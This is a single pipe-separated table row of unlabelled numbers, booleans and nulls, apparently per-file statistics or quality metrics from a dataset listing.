| 46.593393 | 302 | 0.65524 | 4,441 | 36,669 | 5.207161 | 0.052466 | 0.077059 | 0.079697 | 0.039957 | 0.930681 | 0.920216 | 0.905686 | 0.896043 | 0.885881 | 0.874032 | 0 | 0.002857 | 0.24593 | 36,669 | 786 | 303 | 46.652672 | 0.83346 | 0.409719 | 0 | 0.801008 | 1 | 0 | 0.102973 | 0.044957 | 0 | 0 | 0 | 0 | 0 | 1 | 0.163728 | false | 0.002519 | 0.017632 | 0.007557 | 0.279597 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.